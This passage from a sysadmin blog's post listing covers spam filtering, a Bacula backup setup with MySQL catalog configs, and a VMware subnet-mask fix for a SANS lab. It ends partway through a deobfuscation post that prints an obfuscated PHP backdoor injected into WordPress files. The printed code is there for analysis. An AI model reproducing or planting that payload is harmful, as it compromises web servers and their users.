So, there you have it. The conclusion is that if you have a personal email server and you don’t wish to fiddle with it all day long, accept the fact that there will be some spam ending up in your users email boxes and teach them to recognize and delete these few instead. This does not mean that there is no value in installing these tools, but personally I feel that it makes more sense if there is a larger user base or you have a lot higher goals than what the simpler tried and tested tools are giving you.

Contact

I am still very interested in discovering and getting to know good tools and services plus tips and tricks to improve reporting and reducing the amount of spam on my server. Even those meant for production use in business environments. If I don’t want to use them on my own server, I still administrate other servers which these tools can be appropriate to be used on. So send me an email with your suggestion and I will take a look at it and report it here on the blog.

Send me an email at hamartin@moshwire.com and make my day.

Cheers,
Hans

25. December, 2014

Setting up backup with Bacula

Skrevet av Hans Åge Martinsen, 25. December 2014 23:05

I have a some servers running different services and would like to have backups of those servers I deem most important. Since I have minimal experience with Bacula and I have to administrate backups for a few servers at work, I decided I could write about how I set it up and how to use that setup plus configure clients. At the start of writing this, I have not put a lot of thought into anything other than that I wish to use Bacula and that there should be a weekly complete backup and daily incremental backups of each host. Ill try to be thorough as I write this and explain my choices as I get further into this project. One of my colleagues have already made a similar post (this one) which I am using as my initial source to learn and then I will expand on it as I go.

For the purpose of this writing I have decided to take backups of two servers and store the backups on my NAS which is simply a dedicated server with a lot of storage space in it. How I do exactly that I will have to find out as I get to understand how this work. Since my servers are in production seen from my point of view, I have created a set of virtual machines to do initial trial and error testing of Bacula before installing and configuring it on the actual servers.

Halfway into learning about Bacula, I learned that Bacula is designed primarily to work with tape drives or storage types that are interchangeable so that in theory, there is unlimited amounts of storage. My setup will be based on a fixed amount of storage space, meaning the size of my NAS and I will try to the best of my understanding make the setup work within those confinements.

While explaining the configuration I will not explain settings I deem to be self explanatory. In the case that the settings I did not explain are not self explanatory for you, the documentation found on Bacula’s home pages are comprehensive, interesting and informative.

Introduction

Bacula is a client/server system designed to be scalable, meaning that it is divided into several parts where each part has its purpose. Depending on the size and throughput of your server park, these different parts can be deployed on different servers to better handle large amounts of data, I/O, CPU time, databases, etc.

The different components of Bacula

Bacula is built up of 5 different components. The console, file server, catalog, storage and the director where the catalog is more of a conceptual component than an actual component in itself.

Console

The console is an interface to all the other parts of Bacula and it works by communicating with the director. Bacula comes with console software, but any software designed to communicate with the director can be used and there are several options out there. The purpose of the console is to manage the system, not to configure it. Using the console, it is possible to see and manage already made backups plus schedule extra backups when needed and restore distinct files or whole systems. Depending on what kind of hardware you have, it can also be used to tell Bacula that tapes has been swapped, name them, etc.

File server

This is the component you install on the client. The director will contact the file server and tell the client to start backing up data, transfer it or start receiving data for a restore. This component has nothing to do with what is to be backed up or restored. Its only responsibility is to copy data and record meta data for whatever it has been told to take a backup of and transfer it to the server or receive data from the server and store them on the client itself.

Catalog

The catalog will keep a complete index of files, folders, time data plus information about prior and subsequent backups. The meta data itself is stored in an SQL database by default and can be installed on a separate host to support scalability in the system. The catalog in itself is not a component like the others, but a concept of where the meta data for the system/backups are stored. This means that if there is support for it, the catalog can be a flat structure on file, databases, etc.

Storage

The storage component does the actual saving of data to physical media, it being file systems, tape storage, CD-ROMs and a wide set of different storage systems. This component can be hosted on separate servers since all communication with the rest of the Bacula system is done using TCP/IP. For large server parks, the amount of data this component has to handle can be to much for one host to handle, so it is possible to have several storage servers being controlled by one director. What is important to understand here is that the storage daemon handles hardware and understands how to use that hardware in different situations.

Director

The director is central to everything that is done within the system and sews all the other components together. Using the static configuration and individual client configurations, the director will schedule backup jobs, restore jobs and relay whatever the console component is asking for. This description of the director is at best based on poor understanding of the director. It will be updated when or if this understanding becomes better.

My setup

My backup needs at this moment in time make Bacula overkill, but since I want to learn, I still choose to use it. Knowing that the different components can be deployed on individual hosts or all on the same I choose to install the director, console and storage component on the backup server, the file servers on the clients being backed up and the catalog on an already set up database server on my local network.

The backup and database server are physical machines with access to storage space on a NAS, they run Debian stable, version 7.7. The clients are two virtual machines also running Debian stable 7.7. I might, for the purpose of learning myself, add my personal Windows 7 computer to be backed up in addition just to see what the difference in setup is.

Installing the basic components on the server

On the NAS, I make sure that its updated before installing the needed components for Bacula on this host. When dbconfig-common asked to automatically configure the SQL configuration, I chose no. I’ll configure the catalog later since there is no local database server to automatically configure.

root@nas:~# apt-get update && apt-get upgrade
   root@nas:~# apt-get --no-install-recommends install bacula-director-mysql \
   bacula-console \
   bacula-doc \
   bacula-sd \
   bacula-sd-mysql

Static configuration of the components

Bacula is designed to be distributed over several servers if needed, the configuration for each component is also split into a separate file for each component with the exception of the catalog which is configured in the directors config file.

Catalog

The database that will handle the catalog exist on a separate host as explained earlier, so the installation cannot be done automatically by dbconfig-common. So I begin with creating a database and user on the remote host and then populate the database with initial meta data. Creating the database and user plus granting privileges to that user is relatively straight forward, if that is not the case for you, just Google it and you will find a lot of sites explaining it. There is an sh script located at /usr/share/bacula-director/make_mysql_tables which I copied, removed all traces of the script itself leaving only the SQL syntax and then used that as input to the mysql client.

root@nas:~# mysql -h db -u user -p database < ~/make_mysql_tables

The director component has to be configured to use the external database. Edit the Catalog resource found in /etc/bacula/bacula-dir.conf.

Catalog {
     Name = MyCatalog
     dbaddress = db
     dbport = 3306
     dbname = "database"
     dbuser = "user"
     dbpassword = "pass"
   }

Note that I have just written db for hostname, unless you have some magical values written in /etc/hosts, you should use an IP address or a FQDN.

Storage

On the NAS server I have mounted a share to /media/backup which is at this moment in time 637GB large. This share will be defined as a device in the storage daemons configuration file and will be the only device used for all backup purposes. If at a later time I need more space, I can create additional shares for Bacula to use.

root@nas:/home/hamartin# df -h | tail -1
   /dev/mapper/media-backup	637G  198M  605G   1% /media/backup
   root@nas:/home/hamartin#

The configuration for the storage daemon can be found at /etc/bacula/bacula-sd. We begin the configuration by defining the storage daemon itself.

Storage {
     Name = nas-sd
     SDPort = 9103
     SDAddress = 127.0.0.1
     Pid Directory = "/var/run/bacula"
     WorkingDirectory = "/var/lib/bacula"
     Maximum Concurrent Jobs = 2
   }

Each storage daemon must have a name which it uses for authentication and messaging purposes. Two or more storage daemons controlled by one director can not have the same name, meaning that two storage daemons can have the same name as long as they are distinct within one director. Although its possible to have storage daemons with the same name, I see no point in doing that. Take the time to create a proper naming policy instead. I set the amount of concurrent jobs to a maximum of 2 (default is 20), simply because I have no idea how to estimate what this value should be for my setup.

Now that the storage daemon has been defined it has to be made aware of which directors are allowed to contact and manage the daemon. The configuration will have two director definitions, one for management and control and one for monitoring. Each definition will have a name and a password that comes with it. This name and password will have to be identical to the ones that will be defined in the directors configuration file later and all names has to be unique within one directors configuration file. There will be several places within the configuration of this system where you will have to create new passwords. I chose to install pwgen and use it to generate secure and random passwords. Take a look here if you want to see the details.

Director {
     Name = nas-dir
     Password = "pass"
   }

   Director {
     Name = nas-mon
     Password = "pass"
     Monitor = yes
   }

Note that the second director definition has Monitor = yes set, which simply means that any director which uses that name and password to connect to this storage daemon only is able to monitor the daemon, not control it.

Next its time to define a device which the director can use to store data on and that the director can refer to in its configuration. How devices are configured here is dependent on what kind of hardware is being used. Since I will be using fixed storage space which is already mounted on the host system, my device resource will be relatively simple. In the scenario that a tape exchanger or similar is to be used, the device configuration for that will become more complex fast. Take a look at this post if you’re configuring Bacula to use tape exchangers.

Device {
     Name = NASBackup1
     Device Type = File
     Archive Device = "/media/backup"
     LabelMedia = Yes
     Random Access = Yes
     AutomaticMount = Yes
     RemovableMedia = No
     AlwaysOpen = No
   }

A logical name has been given to the device and the device is a File type, which means that it is a random access device and is fixed or removable. The device has been set to not always open, simply because for File types, this setting is ignored. Always open is specifically a Tape, Fifo and DVD settings which forces Bacula to keep the device open. This would also mean that the device can not be used for anything else as long as it is mounted within Bacula.

The last resource of the storage daemon configuration file defines where all messages created by the storage daemon is to be sent.

Messages {
     Name = Standard
     director = nas-dir = all
   }

Director

Now that the storage daemon has been configured with a place to store data and given the director allowance to monitor and control it, I now need to configure the director itself. This configuration file is extensive and I will only be utilizing a small part of it. The configuration file can be found at /etc/bacula/bacula-dir.conf. As with the storage daemon the director has to define itself to.

Director {
     Name = nas-dir
     DIRport = 9101
     DirAddress = 127.0.0.1
     QueryFile = "/etc/bacula/scripts/query.sql"
     WorkingDirectory = "/var/lib/bacula"
     PidDirectory = "/var/run/bacula"
     Maximum Concurrent Jobs = 1
     Password = "pass"
     Messages = Daemon
   }

The name and password for the director has to be copied to the console configuration file found at /etc/bacula/bconsole.conf. The maximum concurrent jobs were 1 by default, which confuses me since the storage daemon resource had a default of 20. Most messages has a designated destination, but there are some messages which does not have a designated destination and in those cases, they will be sent to the Daemon, which you will later see is an alias to send an email to a specific local user. In my case that will be the root user.

Console {
     Name = nas-mon
     Password = "pass"
     CommandACL = status, .status
   }

To be able to get messages, errors and warnings from Bacula messages need to be configured. I will configure the messages to be sent to root on the host itself. If you have functioning email setup on the server itself you have two options. Either configure the email address that Bacula should send the emails directly to in the Messages resource or you can send the emails to a local user and edit /etc/aliases to forward the email to an address of your choice. I like the latter best as this will forward any and all emails sent to that local user instead of just Bacula emails.

Messages {
     Name = Daemon
     mailcommand = "/usr/sbin/bsmtp -h localhost -f \"\(Bacula\) \<%r\>\" -s \"Bacula daemon message\" %r"
     mail = root = all, !skipped
     console = all, !skipped, !saved
     append = "/var/log/bacula/bacula.log" = all, !skipped
   }
   
   Messages {
     Name = Standard
     mailcommand = "/usr/sbin/bsmtp -h localhost -f \"\(Bacula\) \<%r\>\" -s \"Bacula: %t %e of %c %l\" %r"
     operatorcommand = "/usr/sbin/bsmtp -h localhost -f \"\(Bacula\) \<%r\>\" -s \"Bacula: Intervention needed for %j\" %r"
     mail = root = all, !skipped
     operator = root = mount
     console = all, !skipped, !saved
     append = "/var/log/bacula/bacula.log" = all, !skipped
     catalog = all
   }

Earlier, I defined the storage daemon, now I will link that storage daemon to this director by adding/editing a storage resource. The name is arbitrary, but should be descriptive as with all names defined in all the configuration files. The device should be the logical name of a device defined in the storage daemons configuration file and the media type is also arbitrary, but should be the same for all storage resources which are of the same type and support the same “things”. Do not under any circumstances unless you know exactly what you are doing, create two storage resources which point to the same device on the storage daemon. It is written in the documentation that this can make Bacula block and go into a deadlock. If there exist an auto changer for tapes, the auto changer device and not the individual tape station devices should be pointed to by this resource.

Storage {
     Name = File
     Address = 127.0.0.1
     SDPort = 9103
     Password = "pass"
     Device = NASBackup1
     Media Type = File
   }

Setting up jobs, schedules and clients

With the configuration I have done, the system should now be up and running, but it will do absolutely nothing other than occupy minimal amounts of resources on the server. Its time to configure the jobs in itself and schedule these jobs at certain intervals.

Generating secure passwords

Install the pwgen package first.

root@nas:~# apt-get install pwgen

An example on how to generate one secure password that has 32 alpha numerical characters.

root@nas:~# pwgen -s 32 1
   SYkGmfcSt0znPdw1CzYFUntY1fGUxH0G

Todo

Read and understand the best practices for creating a backup solution with Bacula with limited storage resources. Discuss adding local backup in addition to remote backup. Find out some possible solutions on how to find out how many concurrent tasks can be done at the same time without loosing performance.

Sources

18. November, 2014

Changing the Subnet Mask in Vmware Workstation on Debian Jessie

Skrevet av Anders Einar Hilden, 18. November 2014 14:50

I’m currently attending SANS SEC504: Hacker Tools, Techniques, Exploits and Incident Handling in London. For some of the labs in the course we need machines on the IPs 10.10.0.1 and 10.10.71.1 with a subnet mask of 255.255.0.0.

Changing the Subnet Mask for the NAT or host-only networks in VMware Workstation seems like such a easy thing to do. According to VMware it should be as easy as opening the Virtual Network Editor and “type a new value in the Subnet mask text box”.

Oh wait … I can’t change it. The field for subnet mask in the Virtual Network Editor is not editable.

VMware Virtual Network Editor: the field for subnet mask is not editable

Let’s keep googling - plenty matches, but everyone keeps insisting it can be changed in the GUI, or mixes the subnet mask with the subnet IP. Some posts blame permission, but since the Virtual Network Editor always runs as root, that’s not the problem. There are no listings for the vmnets in /etc/network/interfaces or /etc/network/interfaces.d/ and changing the subnet mask in NetworkManager does nothing.

After a lot of thinking (and just after I checked /etc/network/interfaces ) I found /etc/vmware/networking - BINGO! This looks like just the file we were looking for.

Before editing the file we should stop any vmware-related services that might use these files.

1
2
$ sudo service vm<TAB>
vmamqpd vmware vmware-USBArbitrator vmware-workstation-server

I’m not sure witch of these services use the files we are editing, so we’ll stop them all

1
2
3
4
$ sudo service vmamqpd
$ sudo service vmware
$ sudo service vmware-USBArbitrator
$ sudo service vmware-workstation-server

For the SANS course I have set up a new host-only network vmnet2. Since we are using static IPs, and will be running malware on these systems, I have disabled DHCP and not connected a host virtual adapter. The shared folder option Map as a network drive in Windows guests still work, don’t ask me how. Below is the configuration for vmnet2 with a subnet mask of 255.255.0.0.

1
2
3
4
5
answer VNET_2_DHCP no
answer VNET_2_DHCP_CFG_HASH E9892EF1006EBB5D4996DF1A377B10EB0D542B94
answer VNET_2_HOSTONLY_NETMASK 255.255.0.0
answer VNET_2_HOSTONLY_SUBNET 10.10.0.0
answer VNET_2_VIRTUAL_ADAPTER no

Success! (but continue reading, we update the DHCP configuration below the picture)

VMware Virtual Network Editor: the uneditable field contains the subnet mask we wanted

VMware stores DHCP config and leases in /etc/vmware/vmnet<NUM>/dhcpd/. If we have changed the subnet IP, subnet mask, or turned on or off DHCP, these files need to be updated. The configfile contains autogenerated information surronded by “DO NOT MODIFY SECTION”, so we should probably not edit it manually.

If we open VMware Virtual Network Editor (sudo vmware-netcfg), change a setting (e.g. the subnet IP from 10.10.0.0 to 10.11.0.0), save, and then change it back again, VMware will update the files for us.

10. October, 2014

Manual Deobfuscation of a PHP Snippet - Part 1

Skrevet av Anders Einar Hilden, 10. October 2014 18:50

In late July the following question was posted on a IRC-channel i frequent:

Anyone care to devise what an obfuscated PHP payload does?

Sure, why not, sounds like a challenge. This is part 1 of a series of blogposts explaining the headache-inducing three hours that followed.

The following snippet had been added to the top of every PHP file in a Wordpress installation. Scroll right to see it all. Far right.

(obfuscated_1.php.txt) download
1
<?php $fognhntadd = '825h>#]y31]278]y3e]81]K78:56985:6197g>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euh]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%156%x61"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1;5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!f!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825b*[%x5c%x7825h!>!%x5c%x7825fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x78OJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787f%x35%165%x3a%146%x21%76c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gPpde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7%x5c%x78257-C)fepmqnjA%x5c%x78!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2px7822)gj6<^#Y#%x5c%x785cq%x5c%A)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#n2f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]27d}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x55c%x7825t2w>#]y74]273]y76]2x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273w6*3qj%x5c%x78257>%x5c%x782272qj%:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5mmvo:>:iuhofm%x5c%x7825:-5p function fjfgg($n){return chr(ord(]317]445]212]445]43]321]464]284]364]6]234]342x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x78%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x*w%x5c%x7825)kV%x5c%x7878{**f%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmx5c%x787f!>>%x5c%x7822!pd%x5c%x78254y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7%x78e%x5c%x78b%x5c%x7825mm)x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5x78257>%x5c%x782f7&6|7**111127-K)ebfsX5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%d%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce25z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j#)usbut%x5c%x7860cpV%x5c%x787f%x5c%n%x5c%x7825)utjm6<%x#-#}+;%x5c%x7825-qp%x5c%29%51%x29%73", NULL); }c%x7824gps)%x5c%x7825j>1<%x55c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x75c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x723ldfidk!~!<**qp%x5c%x7825!-uy82fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)!gj!|!*1?hmg%x5cx5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jx5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%opo#>b%x5c%x7825!*##>x7825)fnbozcYufhA%x5c%x78272qj%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%0hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x787%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7867825%x5c%x7824-%x5c%x7824!>!f%x21%50%x5c%x7825%x5c%x7878:!x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,475c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPtjw!>!#]y84]275]y83]248]y85tmw!>!#]y84]275]y83]273]y76]277#<%x824-%x5c%x7824%x5c%x785c%x5c%x7825j^%5)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%y3:]84#-!OVMM*<%x22%51%xc%x7860msvd},;uqpuft%x5c%x7860msvd}+%x5c%x7827u%x5c%x7825)7fc%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVP5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj$n)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%|!*bubE{h%x5c%x7825)j{h782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782ftuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4x7825>U<#16,47R57,27R66,#%x5c%x782fq%xisset($GLOBALS["%x61%156%x75x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x782%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x77eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-<!%x5c%x7825o:!>!%x5c%x78:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osv%x7825):fmji%x5c%x7878%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N"%x6f%142%x5f%163%x74%141%x72%164") && (!]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#us%x5c%x7860sfqmbdf)%x5c%x7825%x5c%mji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x78257L6M7]D4]275]D:M8]Df#<%25>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%xc%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hm827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5cx7825%x5c%x7827Y%x5c%x7825652]y85]256]y6g]257]y86]267]y74]275]y725eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c}X;!sp!*#opo#>>}R;msv}.;}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk]y81]265]y72]254]y76]61]yh%x5c%x7825!<*::::::-111112)eobs%xnpd!opjudovg!|!**#j{hnpd#)tutj%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%xc%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UF7825)3of:opjudovg<~%x5c%x78245]K2]285]Ke]53Ld]53]Kc]55Ld]551%x6d%160%x6c%157%x64%145%x28%141%x72NFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUU#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!27&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#5#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<C787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x73]256]y81]265]y72]254]y76#<%x5c%x782x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%xrfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x782tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftm8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%>#]y3g]61]y3f]63]y3:]68]y76#<jepdoF.uofuopD#)sfebfI{jg!)%x5c%x7825z>>2*!%x5I&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{htussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x782%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5cx7825!<***f%x5c%x7827,*e%xufs:~:<*9-1-r%x5c%x7825)s%x5c%x825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:4>X)!gjZ<#opo#>b%x5c%x7825!**1y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!qj%x5c%x78256<*Y%x5c%c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvs57UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpm8pmpusut)tpqssutRe%x5c%x7825)Rc%x7825z>3<!fmtf!%x5c%x7825z>2<!c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x5c%x7824Ypp3)%x5c%x7825cB%x5cvodujpo)##-!#~<#%x5c%x782f%x5c%x%x5c%x7825w6Z6<.5%x5}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x78254-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5x5c%x7878;0]=])0#)U!%x5c%x7fu%x5c%x7825)3of)fepdo%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7>q%x5c%x7825V<*#fopoV;ho0hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7861]y35]256]y76]72]y3d]51]y35]274dXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5f!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!o0hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<if((function_exists(x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x69%164%50%x22%134%x78%62***b%x5c%x7825)sf%x5c%x7878pmpusut!38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{6R25,d7R17,67R37,#%x5c%x782fq%x5c%82f#@#%x5c%x782fqp%x5c%x7825>5o!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~x7860ufldpt}X;%x5c%x7860msv%x5c%x782f#%x5c%x782f#%x5c%x782f},;x29%57%x65","%x65%166%x61%154%x28%1%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x552985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84])!gj}Z;h!opjudovg}{;#)sv%x5c%x78256<C>^#zsfvr#%5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]24%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;5wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5yqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]52c%163%x74%162%x5f%163%x70%154%3]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x%x7825j:>>1*!%x5c%x7825b:>1<!fmtf19275j{hnpd19275fubmgoj{h1:|:*7825>%x5c%x782fh%x5c%x7825:<pd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%svufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<g%x5c%x7825!<12>j%x5c%x7825!|!*#95c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]2565%x5c%x7824-%x5c%x7824*!|!%x5c%x744#)zbssb!>!ssbnpe_GMFT%x)!gj!~<ofmy%x5c%x7825,3,j%x5c%x78<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x782c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gj:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3yf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x782:<##:>:h%x5c%x7825:<#6**#57]38y]47]67y]37]88y5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#66~6<&w6<%x5c%x787fw6*CW&)7gj6fepmqnj!%x5c%x782f!#0#)idubn%x5c%x786c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x78X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7